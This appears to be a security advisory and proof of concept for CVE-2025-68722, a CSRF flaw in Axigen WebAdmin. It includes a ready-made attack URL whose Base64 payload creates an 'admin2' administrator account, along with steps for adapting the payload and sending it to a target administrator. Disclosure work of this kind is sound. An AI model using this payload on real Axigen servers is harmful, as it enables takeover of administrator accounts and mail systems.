# CVE-2025-68722: Axigen WebAdmin CSRF 

### Vulnerability Summary

Critical state-changing actions in the Axigen WebAdmin interface are accessible via **GET requests**. While the `_h` token protects against direct CSRF, the application processes queued requests via the `_s` (breadcrumb) parameter immediately after a user authenticates.

An attacker can craft a URL containing a Base64-encoded payload in the `_s` parameter. If an administrator clicks this link and completes the login process, the queued action is executed automatically in their context.

**Affected Versions:** < 10.6.26

For more info, see the [Axigen Knowledge Base](https://www.axigen.com/knowledgebase/Axigen-WebAdmin-CSRF-Vulnerability-CVE-2025-68722-_407.html).

---

### POC

**Target URL:**
`https://{axigen-domain}:9443/?_h=invalid&_s=eyJwYWdlIjoiYXVzciIsInBhcmFtcyI6eyJhY3Rpb24iOiJhZGQiLCAidXNlcm5hbWVfaW5wdXQiOiJhZG1pbjIiLCAicGFzc3dvcmRfaW5wdXQiOiJhZG1pbjIiLCAiZGlzcGxheV9uYW1lX2lucHV0IjoiYWRtaW4yIn19`

**Decoded Payload (`_s` parameter):**

```json
{"page":"ausr","params":{"action":"add", "username_input":"admin2", "password_input":"admin2", "display_name_input":"admin2"}}

```

### Steps to Reproduce:

1. **Modify:** Change the JSON payload to target different administrative actions (e.g., changing server settings).
2. **Encode:** Re-encode the modified JSON into **Base64**.
3. **Deliver:** Replace the value of the `_s` parameter in the attack URL and deliver it to a target administrator.
4. **Trigger:** Upon logging in via this link, the `admin2` account is created (or your custom action is executed).

---
